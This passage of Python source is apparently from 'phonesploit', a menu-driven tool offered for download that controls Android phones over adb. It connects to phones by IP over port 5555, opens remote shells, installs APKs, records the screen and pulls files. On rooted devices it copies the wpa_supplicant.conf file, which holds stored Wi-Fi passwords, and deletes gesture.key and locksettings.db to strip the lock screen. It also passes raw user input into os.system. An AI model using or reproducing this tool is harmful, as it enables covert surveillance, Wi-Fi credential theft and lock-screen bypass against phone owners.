66 | ':. ':. ':. {1}/_\{0} ,:' ,:' ,:'
67 | ':. ':. {1}/___\{0} ,:' ,:'
68 | ':. {1}/_____\{0} ,:'
69 | {1}/ \\{0}
70 | '''.format(Fore.GREEN, Fore.WHITE, Fore.RED)
71 |
72 | logo_design_pre = '''
73 | {0}╔═╗{1}┬ ┬┌─┐┌┐┌┌─┐{0}╔═╗{1}┌─┐┬ ┌─┐┬┌┬┐
74 | {0}╠═╝{1}├─┤│ ││││├┤ {0}╚═╗{1}├─┘│ │ ││ │
75 | {0}╩ {1}┴ ┴└─┘┘└┘└─┘{0}╚═╝{1}┴ ┴─┘└─┘┴ ┴ '''.format(Fore.GREEN, Fore.WHITE, Fore.RED)
76 | logo_design_3 = logo_design_pre.decode("utf-8")
77 |
78 | logo_design_4 = '''
79 | \033[92m
80 | +hydNNNNdyh+
81 | +mMMMMMMMMMMMMm+
82 | `dMMm\033[0m:\033[92mNMMMMMMN\033[0m:\033[92mmMMd`
83 | hMMMMMMMMMMMMMMMMMMh
84 | \033[92m.. yyyyyyyyyyyyyyyyyyyy .. \033[0m Expoit time :) \033[92m
85 | \033[92m.mMMm`MMMMMMMMMMMMMMMMMMMM`mMMm. \033[0m Thanks for downloading!\033[92m
86 | \033[92m:MMMM-MMMMMMMMMMMMMMMMMMMM-MMMM:
87 | :MMMM-MMMMMMMMMMMMMMMMMMMM-MMMM:
88 | :MMMM-MMMMMMMMMMMMMMMMMMMM-MMMM:
89 | :MMMM-MMMMMMMMMMMMMMMMMMMM-MMMM:
90 | -MMMM-MMMMMMMMMMMMMMMMMMMM-MMMM-
91 | +yy+ MMMMMMMMMMMMMMMMMMMM +yy+
92 | mMMMMMMMMMMMMMMMMMMm
93 | `/++MMMMh++hMMMM++/`
94 | MMMMo oMMMM
95 | MMMMo oMMMM
96 | oNMm- -mMNs'''
97 |
98 | page_1 = '''\n
99 | {0}[{1}1{0}] {2}Show Connected Devices {0}[{1}6{0}] {2}Screen record a phone {0}[{1}11{0}] {2}Uninstall an app
100 | {0}[{1}2{0}] {2}Disconect all devices {0}[{1}7{0}] {2}Screen Shot a picture on a phone {0}[{1}12{0}] {2}Show real time log of device
101 | {0}[{1}3{0}] {2}Connect a new phone {0}[{1}8{0}] {2}Restart Server {0}[{1}13{0}] {2}Dump System Info
102 | {0}[{1}4{0}] {2}Access Shell on a phone {0}[{1}9{0}] {2}Pull folders from phone to pc {0}[{1}14{0}] {2}List all apps on a phone
103 | {0}[{1}5{0}] {2}Install an apk on a phone {0}[{1}10{0}] {2}Turn The Device off {0}[{1}15{0}] {2}Run an app
104 |
105 |
106 | {0}[{1}99{0}] {2}Exit {0}[{1}0{0}] {2}Clear {0}[{1}p{0}] Next Page v1.2
107 | '''.format(Fore.CYAN, Fore.RED, Fore.GREEN)
108 |
109 | page_2 = '''\n
110 | {0}[{1}16{0}]{2} Port Forwarding {0}[{1}21{0}]{2} NetStat
111 | {0}[{1}17{0}]{2} Grab wpa_supplicant {0}[{1}22{0}]{2} Turn WiFi On/Off
112 | {0}[{1}18{0}]{2} Show Mac/Inet {0}[{1}23{0}]{2} Remove Password
113 | {0}[{1}19{0}]{2} Extract apk from app {0}[{1}24{0}]{2} Use Keycode
114 | {0}[{1}20{0}]{2} Get Battery Status {0}[{1}25{0}]{2} Get Current Activity
115 |
116 |
117 | {0}[{1}99{0}] {2}Exit {0}[{1}0{0}] {2}Clear {0}[{1}b{0}] Back to page one
118 | '''.format(Fore.CYAN, Fore.RED, Fore.GREEN)
119 |
120 |
121 | #=============================
122 | #Main
123 | def main():
124 | page_num = 1
125 | option = raw_input(Fore.WHITE + "phonesploit"+Fore.RED + "(main_menu) "+Fore.WHITE + "> ")
126 | if option == '1':
127 | os.system("adb devices -l")
128 | elif option == '2':
129 | os.system("adb disconnect")
130 | elif option == '3':
131 | os.system("adb tcpip 5555")
132 | print (("\n[{0}+{1}] Enter a phones ip address.").format(Fore.RED, Fore.WHITE))
133 | ip = raw_input (arrow+" phonesploit"+Fore.RED + "(connect_phone) "+Fore.WHITE + "> ")
134 | os.system("adb connect "+ip+":5555")
135 |
136 | elif option == '4':
137 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE))
138 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(shell_on_phone) "+Fore.WHITE + "> ")
139 | os.system("adb -s "+device_name+" shell")
140 |
141 | elif option == '5':
142 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE))
143 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(apk_install) "+Fore.WHITE + "> ")
144 | print ((" "+connect))
145 | print ((" [{0}+{1}]Enter the apk location.").format(Fore.RED, Fore.WHITE))
146 | apk_location = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(apk_install) "+Fore.WHITE + "> ")
147 | os.system("adb -s "+device_name+" install "+apk_location)
148 | print (Fore.GREEN + "Apk has been installed.")
149 |
150 | elif option == '6':
151 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE))
152 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(screen_record) "+Fore.WHITE + "> ")
153 | print ((" "+connect))
154 | print ((" [{0}+{1}] Please wait 3m its recording").format(Fore.RED, Fore.WHITE))
155 | print ((" "+connect))
156 | os.system("adb -s "+device_name+" shell screenrecord /sdcard/demo.mp4")
157 | print ((" [{0}+{1}]Enter where you would like the video to be saved.").format(Fore.RED, Fore.WHITE))
158 | place_location = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(screen_record) "+Fore.WHITE + "> ")
159 | os.system("adb -s "+device_name+" pull /sdcard/demo.mp4 "+place_location)
160 |
161 | elif option == '7':
162 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE))
163 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(screenshot) "+Fore.WHITE + "> ")
164 | os.system("adb -s "+device_name+" shell screencap /sdcard/screen.png")
165 | print ((" "+connect))
166 | print ((" [{0}+{1}]Enter where you would like the screenshot to be saved.").format(Fore.RED, Fore.WHITE))
167 | place_location = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(screenshot) "+Fore.WHITE + "> ")
168 | os.system("adb -s "+device_name+" pull /sdcard/screen.png "+place_location)
169 |
170 | elif option == '8':
171 | os.system("adb kill-server && adb start-server")
172 |
173 | elif option == '9':
174 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE))
175 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(file_pull) "+Fore.WHITE + "> ")
176 | print ((" "+connect))
177 | print ((" [{0}+{1}]Enter a file location on a device").format(Fore.RED, Fore.WHITE))
178 | file_location = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(file_pull) "+Fore.WHITE + "> ")
179 | print ((" "+connect))
180 | print ((" [{0}+{1}]Enter where you would like the file to be saved.").format(Fore.RED, Fore.WHITE))
181 | place_location = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(file_pull) "+Fore.WHITE + "> ")
182 | os.system("adb -s "+device_name+" pull "+file_location+" "+place_location)
183 |
184 | elif option == '10':
185 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE))
186 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(device_reboot) "+Fore.WHITE + "> ")
187 | os.system("adb -s "+device_name+ " reboot ")
188 |
189 | elif option == '11':
190 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE))
191 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(app_delete) "+Fore.WHITE + "> ")
192 | print ((" "+connect))
193 | print ((" [{0}+{1}]Enter a package name.").format(Fore.RED, Fore.WHITE))
194 | package_name = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(app_delete) "+Fore.WHITE + "> ")
195 | os.system("adb -s "+device_name+" unistall "+package_name)
196 |
197 | elif option == '12':
198 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE))
199 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(log) "+Fore.WHITE + "> ")
200 | os.system('adb -s '+device_name+" logcat ")
201 |
202 | elif option == '13':
203 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE))
204 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(sys_info) "+Fore.WHITE + "> ")
205 | os.system("adb -s "+device_name+" dumpsys")
206 |
207 | elif option == '14':
208 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE))
209 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(package_manager) "+Fore.WHITE + "> ")
210 | os.system("adb -s " +device_name+ " shell pm list packages -f")
211 | main()
212 |
213 | elif option == '15':
214 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE))
215 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(app_run) "+Fore.WHITE + "> ")
216 | print ((" "+connect))
217 | print ((" [{0}+{1}]Enter a package name. They look like this --> com.snapchat.android").format(Fore.RED, Fore.WHITE))
218 | package_name = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(app_run) "+Fore.WHITE + "> ")
219 | os.system("adb -s "+device_name+" shell monkey -p "+package_name+" -v 500")
220 | main()
221 |
222 | elif option == '16':
223 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE))
224 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(port_forward) "+Fore.WHITE + "> ")
225 | print ((" "+connect))
226 | print ((" [{0}+{1}]Enter a port on the device.").format(Fore.RED, Fore.WHITE))
227 | port_device = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(port_forward) "+Fore.WHITE + "> ")
228 | print ((" "+connect))
229 | print ((" [{0}+{1}]Enter a port to forward it too.").format(Fore.RED, Fore.WHITE))
230 | forward_port = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(port_forward) "+Fore.WHITE + "> ")
231 | os.system("adb -s "+device_name+" forward tcp:"+port_device+" tcp:"+forward_port)
232 |
233 | elif option == '17':
234 | try:
235 | print (("[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE))
236 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(wpa_grab) "+Fore.WHITE + "> ")
237 | print ((Fore.WHITE + " [{0}+{1}]{1}THE DEVICE NEEDS TO BE ROOTED TO CONTINUE TO EXIT USE CTRL +C").format(Fore.RED, Fore.WHITE))
238 | print ((" "+connect))
239 | print ((" [{0}+{1}]Enter where you want the file to be saved.").format(Fore.RED, Fore.WHITE))
240 | location = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(wpa_grab) "+Fore.WHITE + "> ")
241 | os.system("adb -s "+device_name+" shell "+"su -c 'cp /data/misc/wifi/wpa_supplicant.conf /sdcard/'")
242 | os.system("adb -s "+device_name+" pull /sdcard/wpa_supplicant.conf "+location)
243 | except KeyboardInterrupt:
244 | main()
245 |
246 | elif option == '18':
247 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE))
248 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(mac_inet) "+Fore.WHITE + "> ")
249 | os.system("adb -s " +device_name+ " shell ip address show wlan0")
250 | main()
251 |
252 | elif option == '19':
253 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE))
254 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(pull_apk) "+Fore.WHITE + "> ")
255 | print ((" "+connect))
256 | print ((" [{0}+{1}]Enter a package name. They look like this --> com.snapchat.android").format(Fore.RED, Fore.WHITE))
257 | package_name = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(pull_apk) "+Fore.WHITE + "> ")
258 | os.system("adb -s "+device_name+" shell pm path "+package_name)
259 | print ((" "+connect))
260 | print ((" [{0}+{1}]Enter The path.looks like this /data/app/com.snapchat.android-qWgDcBiCEvANq6op_NPqeA==/base.apk").format(Fore.RED, Fore.WHITE))
261 | path = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(pull_apk) "+Fore.WHITE + "> ")
262 | print ((" "+connect))
263 | print ((" [{0}+{1}]Enter The location to store the apk: ") .format(Fore.RED, Fore.WHITE))
264 | location = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(pull_apk) "+Fore.WHITE + "> ")
265 | os.system("adb -s " +device_name+" pull "+path+" "+location)
266 | main()
267 |
268 | elif option == '20':
269 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE))
270 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(battery) "+Fore.WHITE + "> ")
271 | os.system("adb -s " +device_name+ " shell dumpsys battery")
272 | main()
273 |
274 | elif option == '21':
275 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE))
276 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(net_stat) "+Fore.WHITE + "> ")
277 | os.system("adb -s " +device_name+ " shell netstat")
278 | main()
279 |
280 | elif option == '22':
281 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE))
282 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(wifi) "+Fore.WHITE + "> ")
283 | print ((" "+connect))
284 | print ((" [{0}+{1}] To turn wifi back on you need the device to be pluged in.").format(Fore.RED, Fore.WHITE))
285 | print ((" "+connect))
286 | on_off = raw_input(Fore.WHITE + " ["+Fore.RED+"+"+Fore.WHITE+"]Would you like the wifi "+Fore.GREEN +"on"+Fore.WHITE +"/"+Fore.RED +"off "+Fore.WHITE)
287 | if on_off == 'off':
288 | command = " shell svc wifi disable"
289 | else:
290 | command = " shell svc wifi enable"
291 |
292 | os.system("adb -s "+device_name+command)
293 |
294 | elif option == '23':
295 | print (("[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE))
296 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(pass_remove) "+Fore.WHITE + "> ")
297 | print ((Fore.WHITE + " [{0}+{1}]{1}THE DEVICE NEEDS TO BE ROOTED TO CONTINUE TO EXIT USE CTRL +C THIS IS ALSO UNTESTED").format(Fore.RED, Fore.WHITE))
298 | print ((" "+connect))
299 | print (Fore.RED + "******************TRYING TO REMOVE PASS******************")
300 | os.system("adb -s "+device_name+" shell su 0 'rm /data/system/gesture.key'")
301 | os.system("adb -s "+device_name+" shell su 0 'rm /data/system/locksettings.db'")
302 | os.system("adb -s "+device_name+" shell su 0 'rm /data/system/locksettings.db-wal'")
303 | os.system("adb -s "+device_name+" shell su 0 'rm /data/system/locksettings.db-shm'")
304 | print (Fore.RED + "******************TRYING TO REMOVE PASS******************")
305 |
306 | elif option == '24':
307 | print (("[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE))
308 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(keycode) "+Fore.WHITE + "> ")
309 | print ('''
310 | 0 --> "KEYCODE_UNKNOWN"
311 | 1 --> "KEYCODE_MENU"
312 | 2 --> "KEYCODE_SOFT_RIGHT"
313 | 3 --> "KEYCODE_HOME"
314 | 4 --> "KEYCODE_BACK"
315 | 5 --> "KEYCODE_CALL"
316 | 6 --> "KEYCODE_ENDCALL"
317 | 7 --> "KEYCODE_0"
318 | 8 --> "KEYCODE_1"
319 | 9 --> "KEYCODE_2"
320 | 10 --> "KEYCODE_3"
321 | 11 --> "KEYCODE_4"
322 | 12 --> "KEYCODE_5"
323 | 13 --> "KEYCODE_6"
324 | 14 --> "KEYCODE_7"
325 | 15 --> "KEYCODE_8"
326 | 16 --> "KEYCODE_9"
327 | 17 --> "KEYCODE_STAR"
328 | 18 --> "KEYCODE_POUND"
329 | 19 --> "KEYCODE_DPAD_UP"
330 | 20 --> "KEYCODE_DPAD_DOWN"
331 | 21 --> "KEYCODE_DPAD_LEFT"
332 | 22 --> "KEYCODE_DPAD_RIGHT"
333 | 23 --> "KEYCODE_DPAD_CENTER"
334 | 24 --> "KEYCODE_VOLUME_UP"
335 | 25 --> "KEYCODE_VOLUME_DOWN"
336 | 26 --> "KEYCODE_POWER"
337 | 27 --> "KEYCODE_CAMERA"
338 | 28 --> "KEYCODE_CLEAR"
339 | 29 --> "KEYCODE_A"
340 | 30 --> "KEYCODE_B"
341 | 31 --> "KEYCODE_C"
342 | 32 --> "KEYCODE_D"
343 | 33 --> "KEYCODE_E"
344 | 34 --> "KEYCODE_F"
345 | 35 --> "KEYCODE_G"
346 | 36 --> "KEYCODE_H"
347 | 37 --> "KEYCODE_I"
348 | 38 --> "KEYCODE_J"
349 | 39 --> "KEYCODE_K"
350 | 40 --> "KEYCODE_L"
351 | 41 --> "KEYCODE_M"
352 | 42 --> "KEYCODE_N"
353 | 43 --> "KEYCODE_O"
354 | 44 --> "KEYCODE_P"
355 | 45 --> "KEYCODE_Q"
356 | 46 --> "KEYCODE_R"
357 | 47 --> "KEYCODE_S"
358 | 48 --> "KEYCODE_T"
359 | 49 --> "KEYCODE_U"
360 | 50 --> "KEYCODE_V"
361 | 51 --> "KEYCODE_W"
362 | 52 --> "KEYCODE_X"
363 | 53 --> "KEYCODE_Y"
364 | 54 --> "KEYCODE_Z"
365 | 55 --> "KEYCODE_COMMA"
366 | 56 --> "KEYCODE_PERIOD"
367 | 57 --> "KEYCODE_ALT_LEFT"
368 | 58 --> "KEYCODE_ALT_RIGHT"
369 | 59 --> "KEYCODE_SHIFT_LEFT"
370 | 60 --> "KEYCODE_SHIFT_RIGHT"
371 | 61 --> "KEYCODE_TAB"
372 | 62 --> "KEYCODE_SPACE"
373 | 63 --> "KEYCODE_SYM"
374 | 64 --> "KEYCODE_EXPLORER"
375 | 65 --> "KEYCODE_ENVELOPE"
376 | 66 --> "KEYCODE_ENTER"
377 | 67 --> "KEYCODE_DEL"
378 | 68 --> "KEYCODE_GRAVE"
379 | 69 --> "KEYCODE_MINUS"
380 | 70 --> "KEYCODE_EQUALS"
381 | 71 --> "KEYCODE_LEFT_BRACKET"
382 | 72 --> "KEYCODE_RIGHT_BRACKET"
383 | 73 --> "KEYCODE_BACKSLASH"
384 | 74 --> "KEYCODE_SEMICOLON"
385 | 75 --> "KEYCODE_APOSTROPHE"
386 | 76 --> "KEYCODE_SLASH"
387 | 77 --> "KEYCODE_AT"
388 | 78 --> "KEYCODE_NUM"
389 | 79 --> "KEYCODE_HEADSETHOOK"
390 | 80 --> "KEYCODE_FOCUS"
391 | 81 --> "KEYCODE_PLUS"
392 | 82 --> "KEYCODE_MENU"
393 | 83 --> "KEYCODE_NOTIFICATION"
394 | 84 --> "KEYCODE_SEARCH"
395 | 85 --> "TAG_LAST_KEYCODE"
396 | ''')
397 | print (("[{0}+{1}]Enter a number.").format(Fore.RED, Fore.WHITE))
398 | num = raw_input(arrow + "phonesploit"+Fore.RED + "(keycode) "+Fore.WHITE + "> ")
399 | os.system("adb -s "+device_name+" shell input keyevent "+num)
400 |
401 | elif option == '25':
402 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE))
403 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(current_activity) "+Fore.WHITE + "> ")
404 | os.system("adb -s " +device_name+ " dumpsys activity")
405 | main()
406 |
407 | elif option == '0':
408 | global page2
409 | if page2 == True:
410 | clear(page_2)
411 | else:
412 | clear(page_1)
413 |
414 | elif option == 'p':
415 | os.system('clear')
416 | page2 = True
417 | banner_title = random.choice([logo_design_1,logo_design_2,logo_design_3,logo_design_4])
418 | print (Fore.RED + banner_title)
419 | print (page_2)
420 |
421 | elif option == 'b':
422 | os.system('clear')
423 | page2 = False
424 | banner_title = random.choice([logo_design_1,logo_design_2,logo_design_3,logo_design_4])
425 | print (Fore.RED + banner_title)
426 | print (page_1)
427 |
428 | elif option == '99':
429 | exit()
430 |
431 |
432 | main()
433 |
434 | #=============================
435 |
436 | def clear(page):
437 | global page2
438 | os.system('clear')
439 | banner_title = random.choice([logo_design_1,logo_design_2,logo_design_3,logo_design_4])
440 | print (Fore.RED + banner_title)
441 | print (page)
442 |
443 |
444 |
445 | #=============================
446 | # Run
447 | yn = raw_input(Fore.WHITE + "Have you already installed adb via command line "+Fore.GREEN + "Y"+Fore.WHITE+"/"+Fore.RED+"N "+Fore.WHITE)
448 | if yn == "n":
449 | os.system("sudo apt install adb")
450 | print (Fore.RED + "Starting adb server..")
451 | os.system("adb tcpip 5555")
452 | t.sleep(4)
453 | os.system('clear')
454 | banner_title = random.choice([logo_design_1,logo_design_2,logo_design_3,logo_design_4])
455 | print (Fore.RED + banner_title)
456 | print (page_1)
457 | main()
458 |
--------------------------------------------------------------------------------